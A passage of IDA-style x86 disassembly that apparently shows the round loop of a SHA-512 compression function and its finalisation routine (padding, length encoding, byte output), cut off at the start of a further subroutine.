		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_A8]
		adc	edx, [esp+170h+var_A4]
		add	ecx, [esp+170h+var_F8]
		adc	edx, [esp+170h+var_F4]
		mov	[eax+0A8h], ecx
		mov	[eax+0ACh], edx
		mov	eax, edx
		mov	[esp+170h+var_F8], ecx
		mov	[esp+170h+var_F4], eax
		mov	[esp+170h+var_50], ecx
		jmp	short loc_416C00
; ---------------------------------------------------------------------------

loc_416BF1:				; CODE XREF: sub_415050+1AB0j
		mov	edx, [esp+170h+var_F8]
		mov	eax, [esp+170h+var_F4]
		mov	[esp+170h+var_50], edx

loc_416C00:				; CODE XREF: sub_415050+1B9Fj
		mov	ecx, [esp+170h+var_14C]
		mov	ebx, ecx
		mov	[esp+170h+var_4C], eax
		mov	eax, [esp+170h+var_150]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_14C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_148]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_14C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_144]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_134]
		not	ebx
		and	ebx, [esp+170h+var_13C]
		not	edi
		and	edi, [esp+170h+var_140]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B50[eax*8]
		adc	esi, ds:dword_420B54[eax*8]
		add	edx, [esp+170h+var_50]
		mov	eax, [esp+170h+var_138]
		adc	esi, [esp+170h+var_4C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_158], eax
		mov	[esp+170h+var_134], ecx
		mov	[esp+170h+var_138], eax
		adc	[esp+170h+var_154], ecx
		mov	ecx, [esp+170h+var_130]
		mov	eax, [esp+170h+var_12C]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_130]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_124]
		shl	ebx, 19h
		xor	esi, edx
		mov	edx, [esp+170h+var_128]
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edi, ecx
		mov	ecx, [esp+170h+var_130]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_120]
		and	edx, ecx
		mov	ecx, [esp+170h+var_124]
		xor	ebp, eax
		and	ebp, [esp+170h+var_11C]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_138], edi
		adc	[esp+170h+var_134], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_416E43
		mov	eax, [esp+170h+var_C0]
		mov	ecx, [esp+170h+var_BC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_BC]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_E8]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_E4]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_E8]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_E4]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_D0]
		adc	edx, [esp+170h+var_CC]
		add	ecx, [esp+170h+var_B0]
		adc	edx, [esp+170h+var_AC]
		mov	[eax+0B0h], ecx
		mov	[eax+0B4h], edx
		mov	eax, edx
		mov	[esp+170h+var_B0], ecx
		mov	[esp+170h+var_AC], eax
		mov	[esp+170h+var_40], ecx
		jmp	short loc_416E58
; ---------------------------------------------------------------------------

loc_416E43:				; CODE XREF: sub_415050+1CF6j
		mov	edx, [esp+170h+var_B0]
		mov	eax, [esp+170h+var_AC]
		mov	[esp+170h+var_40], edx

loc_416E58:				; CODE XREF: sub_415050+1DF1j
		mov	ecx, [esp+170h+var_154]
		mov	[esp+170h+var_3C], eax
		mov	eax, [esp+170h+var_158]
		mov	ebx, ecx
		xor	esi, esi
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		mov	edx, ecx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		xor	ebx, ebx
		or	ebx, ebp
		mov	ebp, [esp+170h+var_154]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		mov	ecx, eax
		shl	ecx, 12h
		shr	ebp, 0Eh
		or	ecx, ebp
		mov	ebp, [esp+170h+var_150]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_154]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_14C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_13C]
		not	edi
		and	edi, [esp+170h+var_148]
		not	ebx
		and	ebx, [esp+170h+var_144]
		xor	edi, ebp
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B58[eax*8]
		mov	edi, [esp+170h+var_12C]
		adc	esi, ds:dword_420B5C[eax*8]
		add	edx, [esp+170h+var_40]
		mov	eax, [esp+170h+var_140]
		adc	esi, [esp+170h+var_3C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_120], eax
		mov	esi, [esp+170h+var_130]
		mov	[esp+170h+var_140], eax
		adc	[esp+170h+var_11C], ecx
		mov	[esp+170h+var_13C], ecx
		mov	ecx, [esp+170h+var_138]
		mov	eax, esi
		xor	eax, ecx
		mov	[esp+170h+var_98], eax
		mov	eax, [esp+170h+var_134]
		mov	edx, edi
		xor	edx, eax
		mov	[esp+170h+var_94], edx
		mov	edx, esi
		and	edx, ecx
		mov	[esp+170h+var_90], edx
		mov	edx, edi
		and	edx, eax
		mov	[esp+170h+var_8C], edx
		mov	edx, ecx
		xor	esi, esi
		shl	edx, 4
		mov	edi, ecx
		mov	ebx, eax
		shrd	edi, ebx, 1Ch
		shr	ebx, 1Ch
		or	edx, ebx
		or	esi, edi
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	ebx, ebx
		shl	ecx, 1Eh
		or	ebx, ebp
		mov	edi, eax
		xor	edx, ebx
		mov	ebx, [esp+170h+var_138]
		shr	edi, 2
		or	edi, ecx
		mov	ecx, eax
		shld	eax, ebx, 19h
		xor	esi, edi
		shr	ecx, 7
		xor	edi, edi
		or	edi, eax
		mov	eax, [esp+170h+var_98]
		and	eax, [esp+170h+var_128]
		shl	ebx, 19h
		xor	eax, [esp+170h+var_90]
		or	ecx, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_94]
		and	ecx, [esp+170h+var_124]
		xor	edx, edi
		xor	ecx, [esp+170h+var_8C]
		add	esi, eax
		adc	edx, ecx
		add	[esp+170h+var_140], esi
		adc	[esp+170h+var_13C], edx
		cmp	[esp+170h+var_15C], 0
		jz	loc_4170BF
		mov	eax, [esp+170h+var_A0]
		mov	ecx, [esp+170h+var_9C]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_9C]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_F8]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_F4]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_F8]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_F4]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_D8]
		adc	edx, [esp+170h+var_D4]
		add	ecx, [esp+170h+var_C0]
		adc	edx, [esp+170h+var_BC]
		mov	[eax+0B8h], ecx
		mov	[eax+0BCh], edx
		mov	eax, edx
		mov	[esp+170h+var_C0], ecx
		mov	[esp+170h+var_BC], eax
		mov	[esp+170h+var_30], ecx
		jmp	short loc_4170D4
; ---------------------------------------------------------------------------

loc_4170BF:				; CODE XREF: sub_415050+1F7Ej
		mov	edx, [esp+170h+var_C0]
		mov	eax, [esp+170h+var_BC]
		mov	[esp+170h+var_30], edx

loc_4170D4:				; CODE XREF: sub_415050+206Dj
		mov	ecx, [esp+170h+var_11C]
		mov	ebx, ecx
		mov	[esp+170h+var_2C], eax
		mov	eax, [esp+170h+var_120]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_11C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		shr	ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_158]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_11C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_154]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_148]
		not	ebx
		and	ebx, [esp+170h+var_14C]
		not	edi
		and	edi, [esp+170h+var_150]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B60[eax*8]
		adc	esi, ds:dword_420B64[eax*8]
		add	edx, [esp+170h+var_30]
		mov	eax, [esp+170h+var_128]
		adc	esi, [esp+170h+var_2C]
		add	ecx, edx
		mov	edx, [esp+170h+var_144]
		adc	edx, esi
		add	eax, ecx
		adc	[esp+170h+var_124], edx
		mov	[esp+170h+var_148], ecx
		mov	ecx, [esp+170h+var_140]
		mov	[esp+170h+var_144], edx
		mov	edx, [esp+170h+var_13C]
		mov	ebx, ecx
		mov	ebp, edx
		shrd	ebx, ebp, 1Ch
		xor	edi, edi
		or	edi, ebx
		mov	esi, ecx
		mov	ebx, edx
		shld	edx, ecx, 1Eh
		shr	ebp, 1Ch
		shl	esi, 4
		or	esi, ebp
		shr	ebx, 2
		shl	ecx, 1Eh
		xor	ebp, ebp
		or	ebx, ecx
		mov	[esp+170h+var_128], eax
		or	ebp, edx
		mov	ecx, [esp+170h+var_13C]
		xor	esi, ebp
		mov	ebp, [esp+170h+var_140]
		mov	edx, ecx
		shld	ecx, ebp, 19h
		xor	edi, ebx
		shr	edx, 7
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_98]
		and	ecx, [esp+170h+var_140]
		shl	ebp, 19h
		xor	ecx, [esp+170h+var_90]
		or	edx, ebp
		xor	edi, edx
		mov	edx, [esp+170h+var_94]
		and	edx, [esp+170h+var_13C]
		xor	esi, ebx
		xor	edx, [esp+170h+var_8C]
		add	edi, ecx
		adc	esi, edx
		add	[esp+170h+var_148], edi
		adc	[esp+170h+var_144], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_417320
		mov	eax, [esp+170h+var_B0]
		mov	ecx, [esp+170h+var_AC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_AC]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_E0]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_DC]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_E0]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_DC]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_118]
		adc	edx, [esp+170h+var_114]
		add	ecx, [esp+170h+var_A0]
		adc	edx, [esp+170h+var_9C]
		mov	[eax+0C0h], ecx
		mov	[eax+0C4h], edx
		mov	eax, edx
		mov	[esp+170h+var_9C], eax
		mov	[esp+170h+var_1C], eax
		mov	eax, [esp+170h+var_128]
		mov	[esp+170h+var_A0], ecx
		mov	[esp+170h+var_20], ecx
		jmp	short loc_41733C
; ---------------------------------------------------------------------------

loc_417320:				; CODE XREF: sub_415050+21CEj
		mov	edx, [esp+170h+var_A0]
		mov	ecx, [esp+170h+var_9C]
		mov	[esp+170h+var_20], edx
		mov	[esp+170h+var_1C], ecx

loc_41733C:				; CODE XREF: sub_415050+22CEj
		mov	ecx, [esp+170h+var_124]
		mov	ebx, ecx
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_124]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_120]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_124]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_11C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_14C]
		not	ebx
		and	ebx, [esp+170h+var_154]
		not	edi
		and	edi, [esp+170h+var_158]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B68[eax*8]
		adc	esi, ds:dword_420B6C[eax*8]
		add	edx, [esp+170h+var_20]
		mov	eax, [esp+170h+var_150]
		adc	esi, [esp+170h+var_1C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_130], eax
		mov	[esp+170h+var_14C], ecx
		mov	[esp+170h+var_150], eax
		adc	[esp+170h+var_12C], ecx
		mov	eax, [esp+170h+var_144]
		mov	ecx, [esp+170h+var_148]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_148]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		xor	edx, edx
		or	edx, ebp
		mov	ebp, [esp+170h+var_13C]
		xor	ebp, [esp+170h+var_134]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_140]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_138]
		and	ebp, eax
		mov	eax, [esp+170h+var_13C]
		and	eax, [esp+170h+var_134]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_148]
		and	edx, ecx
		xor	ebx, edx
		xor	ebp, eax
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_150], edi
		adc	[esp+170h+var_14C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_41756A
		mov	eax, [esp+170h+var_C0]
		mov	ecx, [esp+170h+var_BC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_BC]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_100]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_FC]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_100]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_FC]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_C8]
		adc	edx, [esp+170h+var_C4]
		add	ecx, [esp+170h+var_E0]
		adc	edx, [esp+170h+var_DC]
		mov	[eax+0C8h], ecx
		mov	[eax+0CCh], edx
		mov	eax, edx
		mov	[esp+170h+var_E0], ecx
		mov	[esp+170h+var_DC], eax
		mov	[esp+170h+var_10], ecx
		jmp	short loc_41757F
; ---------------------------------------------------------------------------

loc_41756A:				; CODE XREF: sub_415050+2429j
		mov	edx, [esp+170h+var_E0]
		mov	eax, [esp+170h+var_DC]
		mov	[esp+170h+var_10], edx

loc_41757F:				; CODE XREF: sub_415050+2518j
		mov	ecx, [esp+170h+var_12C]
		mov	ebx, ecx
		mov	[esp+170h+var_C], eax
		mov	eax, [esp+170h+var_130]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_12C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_128]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_12C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_124]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_154]
		not	ebx
		and	ebx, [esp+170h+var_11C]
		not	edi
		and	edi, [esp+170h+var_120]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B70[eax*8]
		adc	esi, ds:dword_420B74[eax*8]
		add	edx, [esp+170h+var_10]
		mov	eax, [esp+170h+var_158]
		adc	esi, [esp+170h+var_C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_138], eax
		mov	[esp+170h+var_154], ecx
		mov	[esp+170h+var_158], eax
		adc	[esp+170h+var_134], ecx
		mov	ecx, [esp+170h+var_150]
		mov	eax, [esp+170h+var_14C]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_150]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		shl	ebx, 19h
		xor	edx, edx
		or	edx, ebp
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edi, ecx
		mov	ecx, [esp+170h+var_150]
		xor	esi, edx
		mov	edx, [esp+170h+var_140]
		mov	ebx, ecx
		and	ecx, edx
		xor	ebx, edx
		and	ebx, [esp+170h+var_148]
		mov	ebp, eax
		xor	ebp, [esp+170h+var_13C]
		mov	edx, ecx
		and	ebp, [esp+170h+var_144]
		mov	ecx, [esp+170h+var_13C]
		and	eax, ecx
		xor	ebx, edx
		xor	ebp, eax
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_158], edi
		mov	edi, [esp+170h+var_15C]
		adc	[esp+170h+var_154], esi
		add	edi, 10h
		cmp	edi, 50h
		mov	[esp+170h+var_15C], edi
		jb	loc_4151E0
		mov	eax, [esp+170h+var_4]
		mov	edx, [esp+170h+var_158]
		add	[eax], edx
		mov	edx, [esp+170h+var_154]
		pop	edi
		adc	[eax+4], edx
		mov	eax, [esp+16Ch+arg_0]
		mov	edx, [esp+16Ch+var_150]
		add	[eax+18h], edx
		mov	edx, [esp+16Ch+var_14C]
		pop	esi
		adc	[eax+1Ch], edx
		mov	edx, [esp+168h+var_148]
		add	[eax+20h], edx
		mov	edx, [esp+168h+var_144]
		pop	ebp
		adc	[eax+24h], edx
		mov	edx, [esp+164h+var_140]
		add	[eax+28h], edx
		mov	edx, [esp+164h+var_134]
		pop	ebx
		adc	[eax+2Ch], ecx
		mov	ecx, [esp+160h+var_138]
		add	[eax+30h], ecx
		mov	ecx, [esp+160h+var_130]
		adc	[eax+34h], edx
		add	[eax+38h], ecx
		mov	edx, [esp+160h+var_12C]
		mov	ecx, [esp+160h+var_128]
		adc	[eax+3Ch], edx
		add	[eax+40h], ecx
		mov	edx, [esp+160h+var_124]
		mov	ecx, [esp+160h+var_120]
		adc	[eax+44h], edx
		add	[eax+48h], ecx
		mov	edx, [esp+160h+var_11C]
		adc	[eax+4Ch], edx
		add	esp, 160h
		retn
sub_415050	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_417760	proc near		; CODE XREF: .text:004179E2p
					; sub_41C177+CAp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

		push	ecx
		mov	ecx, [ebx]
		push	ebp
		and	ecx, 7Fh
		push	esi
		lea	esi, [ecx+7]
		shr	esi, 3
		push	edi
		mov	[esp+10h+var_4], ecx
		jz	short loc_4177C5
		lea	edx, [ebx+esi*8+50h]

loc_417779:				; CODE XREF: sub_417760+5Fj
		mov	eax, [edx-8]
		mov	ecx, [edx-4]
		sub	edx, 8
		mov	edi, eax
		sub	esi, 1
		ror	edi, 8
		and	edi, 0FF00FF00h
		rol	eax, 8
		and	eax, 0FF00FFh
		or	edi, eax
		mov	ebp, ecx
		xor	eax, eax
		ror	ebp, 8
		and	ebp, 0FF00FF00h
		rol	ecx, 8
		and	ecx, 0FF00FFh
		or	ebp, ecx
		xor	ecx, ecx
		or	eax, ebp
		or	edi, ecx
		test	esi, esi
		mov	[edx], eax
		mov	[edx+4], edi
		jnz	short loc_417779
		mov	ecx, [esp+10h+var_4]

loc_4177C5:				; CODE XREF: sub_417760+13j
		mov	eax, ecx
		and	eax, 7
		add	eax, eax
		add	eax, eax
		mov	esi, dword_426BA8[eax+eax]
		mov	edi, dword_426BAC[eax+eax]
		add	eax, eax
		mov	edx, ecx
		shr	edx, 3
		and	esi, [ebx+edx*8+50h]
		and	edi, [ebx+edx*8+54h]
		or	esi, dword_426BE8[eax]
		or	edi, dword_426BEC[eax]
		cmp	ecx, 6Fh
		mov	[ebx+edx*8+50h], esi
		mov	[ebx+edx*8+54h], edi
		jbe	short loc_41782A
		cmp	ecx, 78h
		jnb	short loc_41781D
		mov	dword ptr [ebx+0C8h], 0
		mov	dword ptr [ebx+0CCh], 0

loc_41781D:				; CODE XREF: sub_417760+A7j
		push	ebx
		call	sub_415050
		add	esp, 4
		xor	edx, edx
		jmp	short loc_417832
; ---------------------------------------------------------------------------

loc_41782A:				; CODE XREF: sub_417760+A2j
		add	edx, 1
		cmp	edx, 0Eh
		jnb	short loc_417858

loc_417832:				; CODE XREF: sub_417760+C8j
		mov	ecx, 0Dh
		sub	ecx, edx
		add	ecx, ecx
		add	ecx, ecx
		lea	esi, [ebx+edx*8+50h]
		add	ecx, ecx
		shr	ecx, 2
		lea	edi, [esi+8]
		mov	dword ptr [esi], 0
		mov	dword ptr [esi+4], 0
		rep movsd

loc_417858:				; CODE XREF: sub_417760+D0j
		mov	edx, [ebx+8]
		mov	esi, [ebx+0Ch]
		mov	ecx, [ebx+4]
		mov	eax, [ebx]
		shld	esi, edx, 3
		add	edx, edx
		mov	edi, ecx
		shld	ecx, eax, 3
		add	edx, edx
		add	eax, eax
		add	edx, edx
		add	eax, eax
		shr	edi, 1Dh
		xor	ebp, ebp
		or	edx, edi
		add	eax, eax
		or	esi, ebp
		push	ebx
		mov	[ebx+0C0h], edx
		mov	[ebx+0C4h], esi
		mov	[ebx+0C8h], eax
		mov	[ebx+0CCh], ecx
		call	sub_415050
		add	esp, 4
		xor	esi, esi

loc_4178A5:				; CODE XREF: sub_417760+171j
		mov	ecx, esi
		not	ecx
		and	ecx, 7
		mov	edx, esi
		shr	edx, 3
		mov	eax, [ebx+edx*8+10h]
		mov	edx, [ebx+edx*8+14h]
		add	ecx, ecx
		add	ecx, ecx
		add	ecx, ecx
		call	sub_411EA0
		mov	ecx, [esp+10h+arg_0]
		mov	[esi+ecx], al
		add	esi, 1
		cmp	esi, 40h
		jb	short loc_4178A5
		pop	edi
		pop	esi
		pop	ebp
		pop	ecx
		retn
sub_417760	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4178E0	proc near		; CODE XREF: sub_41C177+A3p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

